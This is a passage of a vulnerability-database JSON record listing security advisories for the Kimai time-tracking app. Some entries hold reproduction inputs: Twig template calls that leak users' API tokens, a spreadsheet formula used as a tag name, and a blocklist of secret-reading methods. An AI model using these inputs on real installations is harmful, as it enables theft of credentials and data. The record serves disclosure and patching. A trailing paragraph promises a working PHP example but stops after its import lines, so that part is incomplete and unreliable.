\n\nAdditional checks were added to prevent access to configs that start with `saml.` or `ldap.`.\n\nKimai will not issue a CVE, because this requires a SUPER_ADMIN account and it only affects systems with activated LDAP or SAML that also use the invoice system.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-vrqv-52x7-rm4v","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-vrqv-52x7-rm4v"},{"reference_url":"https://github.com/advisories/GHSA-vrqv-52x7-rm4v","reference_id":"GHSA-vrqv-52x7-rm4v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vrqv-52x7-rm4v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["GHSA-vrqv-52x7-rm4v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kjkh-andk-qqa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359952?format=json","vulnerability_id":"VCID-nxtw-3hcs-mydx","summary":"Kimai leaks API Token Hash via Invoice Twig Template\n## Summary\n\nThe Twig sandbox used for invoice templates blocks certain sensitive `User` 
methods (password, TOTP secret, etc.) via a blocklist in `StrictPolicy::checkMethodAllowed()`. However, `getApiToken()` and `getPlainApiToken()` are not on the blocklist. An admin who creates an invoice template can embed calls to these methods, causing the bcrypt or sodium hashed API password of any user who generates an invoice using that template to be included in the rendered output.\n\nOnly relevant for OnPremise installations with template upload activated.\n\n## Background\n\nKimai allows admins (`ROLE_ADMIN` and above) with the `manage_invoice_template` permission to create Twig-based invoice templates. These templates are rendered in a sandboxed Twig environment with `StrictPolicy` controlling which methods and properties are accessible.\n\n`StrictPolicy` explicitly blocks:\n\n```php\n// src/Twig/SecurityPolicy/StrictPolicy.php:156\nif (\\in_array($lcm, [\n    'getpassword',\n    'gettotpsecret',\n    'getplainpassword',\n    'getconfirmationtoken',\n    'gettotpauthenticationconfiguration'\n], true)) {\n    throw new SecurityNotAllowedMethodError(...);\n}\n```\n\n`getApiToken()` and `getPlainApiToken()` are **not** in this list and are freely callable.\n\n## Vulnerable Code\n\n`StrictPolicy.php` — missing entries in the User method blocklist:\n\n```php\n// Current\n['getpassword', 'gettotpsecret', 'getplainpassword', 'getconfirmationtoken', 'gettotpauthenticationconfiguration']\n\n// Should also include:\n'getapitoken', 'getplainapitoken'\n```\n\nThe invoice model passes a `User` object through `model.user`, accessible in any twig invoice template.\n\n## Steps to Reproduce\n\n1. Log in as an admin with the `manage_invoice_template` permission.\n2. Create a new Twig invoice template (HTML or PDF) containing:\n\n```twig\nAPI Token: {{ model.user.getApiToken() }}\nPlain Token: {{ model.user.getPlainApiToken() }}\n```\n\n3. Save the template and set it as the default for a customer.\n4. 
Log in as a regular user assigned to that customer and generate an invoice.\n5. Observe that the rendered invoice contains the user's API token in plaintext.\n\n## Impact\n\nAn admin can silently embed token-exfiltration code in a shared invoice template. Every user who subsequently generates an invoice using that template will have their hashed API token leaked into the invoice output. \n\n- API passwords have been [deprecated since April 2024](https://www.kimai.org/en/changelog/2024/cloud-update-104) and are not in wide use anymore (especially by new users)\n- The function `getPlainApiToken()` never returns any data\n- The function `getApiToken()` might return a bcrypt- or sodium-hashed API password, if the user (who created the invoice) has configured one; this cannot be used directly but would first need to be cracked using rainbow tables\n- The cloud does not allow Twig template upload; this is only relevant for OnPremise installations with template upload activated\n\n## Fix\n\nThe SecurityPolicy was changed to exclude methods that contain certain trigger words instead of using the hard-coded list, see https://github.com/kimai/kimai/pull/5878 \n\nThis disables access to both the `getApiToken()` and `getPlainApiToken()` 
function.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/5878","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/5878"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc"},{"reference_url":"https://github.com/advisories/GHSA-rh42-6rj2-xwmc","reference_id":"GHSA-rh42-6rj2-xwmc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rh42-6rj2-xwmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["GHSA-rh42-6rj2-xwmc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nxtw-3hcs-mydx"},{"url"
:"http://public2.vulnerablecode.io/api/vulnerabilities/80851?format=json","vulnerability_id":"VCID-qvcx-4wyw-4uba","summary":"Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41498","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.01983","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41498"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41498","reference_id":"","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41498"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.54.0","reference_id":"2.54.0","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:31:51Z/"}],"url":"https:
//github.com/kimai/kimai/releases/tag/2.54.0"},{"reference_url":"https://github.com/advisories/GHSA-jv9x-w4gm-hwcm","reference_id":"GHSA-jv9x-w4gm-hwcm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jv9x-w4gm-hwcm"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm","reference_id":"GHSA-jv9x-w4gm-hwcm","reference_type":"","scores":[{"value":"3.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:31:51Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["CVE-2026-41498","GHSA-jv9x-w4gm-hwcm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qvcx-4wyw-4uba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/66917?format=json","vulnerability_id":"VCID-vz3c-4twe-ffgv","summary":"Kimai is a web-based multi-user time-tracking application. Prior to version 2.46.0, Kimai's export functionality uses a Twig sandbox with an overly permissive security policy (`DefaultPolicy`) that allows arbitrary method calls on objects available in the template context. 
An authenticated user with export permissions can deploy a malicious Twig template that extracts sensitive information including environment variables, all user password hashes, serialized session tokens, and CSRF tokens. Version 2.46.0 patches this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23626","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22487","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23626"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://twig.symfony.com/doc/3.x/api.html#sandbox-extension","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://twig.symfony.com/doc/3.x/api.html#sandbox-extension"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.46.0","reference_id":"2.46.0","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.46.0"},{"reference_url":"https://github.com/kimai/kimai/pull/5757","reference_id":"5757","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"val
ue":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/pull/5757"},{"reference_url":"https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f","reference_id":"6a86afb5fd79f6c1825060b87c09bd1909c2e86f","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19:37:30Z/"}],"url":"https://github.com/kimai/kimai/commit/6a86afb5fd79f6c1825060b87c09bd1909c2e86f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23626","reference_id":"CVE-2026-23626","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23626"},{"reference_url":"https://github.com/advisories/GHSA-jg2j-2w24-54cg","reference_id":"GHSA-jg2j-2w24-54cg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jg2j-2w24-54cg"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg","reference_id":"GHSA-jg2j-2w24-54cg","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T19
:37:30Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jg2j-2w24-54cg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/37913?format=json","purl":"pkg:composer/kimai/kimai@2.46.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-8vkc-r8z8-7ugb"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kahk-zqmm-zka9"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-nxtw-3hcs-mydx"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"},{"vulnerability":"VCID-ys8u-pn7h-ayc7"},{"vulnerability":"VCID-zfjd-s5wk-eqbz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.46.0"}],"aliases":["CVE-2026-23626","GHSA-jg2j-2w24-54cg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vz3c-4twe-ffgv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70317?format=json","vulnerability_id":"VCID-we4j-21ku-9yf2","summary":"Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue() joins tag names with implode() and returns the result unchanged. OpenSpout promotes any =-prefixed string to a FormulaCell, writing <f>SUM(54+51)</f> into the XLSX archive. Excel evaluates the formula when the file is opened. 
This issue has been patched in version 2.54.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42267","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11933","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42267"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42267","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42267"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.54.0","reference_id":"2.54.0","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T12:57:49Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.54.0"},{"reference_url":"https://github.com/advisories/GHSA-3xc2-h5r3-wv3r"
,"reference_id":"GHSA-3xc2-h5r3-wv3r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3xc2-h5r3-wv3r"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r","reference_id":"GHSA-3xc2-h5r3-wv3r","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T12:57:49Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["CVE-2026-42267","GHSA-3xc2-h5r3-wv3r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-we4j-21ku-9yf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84182?format=json","vulnerability_id":"VCID-ys8u-pn7h-ayc7","summary":"Kimai is an open-source time tracking application. In versions 1.16.3 through 2.52.0, the escapeForHtml() function in KimaiEscape.js does not escape double quote or single quote characters. When a user's profile alias is inserted into an HTML attribute context via the team member form prototype and rendered through innerHTML, this incomplete escaping allows HTML attribute injection. 
An authenticated user with ROLE_USER privileges can store a malicious alias that executes JavaScript in the browser of any administrator viewing the team form, resulting in stored XSS with privilege escalation. This issue has been fixed in version 2.53.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40479","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01649","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40479"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/2959","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/2959"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40479","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40479"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.53.0","reference_id":"2.53.0","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:
A/M:M/D:T/2026-04-20T16:09:41Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.53.0"},{"reference_url":"https://github.com/advisories/GHSA-g82g-m9vx-vhjg","reference_id":"GHSA-g82g-m9vx-vhjg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-g82g-m9vx-vhjg"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-g82g-m9vx-vhjg","reference_id":"GHSA-g82g-m9vx-vhjg","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:09:41Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-g82g-m9vx-vhjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["CVE-2026-40479","GHSA-g82g-m9vx-vhjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ys8u-pn7h-ayc7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84278?format=json","vulnerability_id":"VCID-zfjd-s5wk-eqbz","summary":"Kimai is an open-source time tracking application. In versions 2.52.0 and below, the User Preferences API endpoint (PATCH /api/users/{id}/preferences) applies submitted preference values without checking the isEnabled() flag on preference objects. 
Although the hourly_rate and internal_rate fields are correctly marked as disabled for users lacking the hourly-rate role permission, the API ignores this restriction and saves the values directly. Any authenticated user can modify their own billing rates through this endpoint, resulting in unauthorized financial tampering affecting invoices and timesheet calculations. This issue has been fixed in version 2.53.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40486","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05834","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40486"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40486","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40486"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.53.0","reference_id":"2.53.0","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:42:34Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.53.0"},{"reference_url":"https://github.com/advisories/GHSA-qh43-xrjm-4ggp","reference_id":"GHSA-qh
43-xrjm-4ggp","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qh43-xrjm-4ggp"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-qh43-xrjm-4ggp","reference_id":"GHSA-qh43-xrjm-4ggp","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:42:34Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-qh43-xrjm-4ggp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["CVE-2026-40486","GHSA-qh43-xrjm-4ggp"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zfjd-s5wk-eqbz"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.41.0"}
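The two Twig-sandbox fixes described in the advisory texts above (GHSA-vrqv-52x7-rm4v: `config()` restricted to a pre-configured list plus a `saml.`/`ldap.` prefix check; GHSA-rh42-6rj2-xwmc: methods refused by trigger word instead of a hard-coded list) rendered as one working PHP example. This is added illustration, not Kimai's code: `TriggerWordPolicy`, `sandboxedConfig()`, the `User` class, the trigger-word list and the sample settings are assumptions made for the example; the Twig 3 sandbox API (`SecurityPolicyInterface`, `SecurityPolicy`, `SandboxExtension`, `SecurityNotAllowedMethodError`) is real.

```php
<?php
// Added example, not Kimai's code: a Twig 3 sandbox policy that refuses
// object methods by trigger word instead of a fixed method list, plus a
// sandboxed config() function limited to an allowlist and a saml./ldap.
// prefix denylist. TriggerWordPolicy, sandboxedConfig(), User and the
// sample settings are illustrative assumptions, not Kimai identifiers.
// Run: composer require twig/twig && php sandbox_policy.php   (PHP 8.1+)
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityNotAllowedMethodError;
use Twig\Sandbox\SecurityPolicy;
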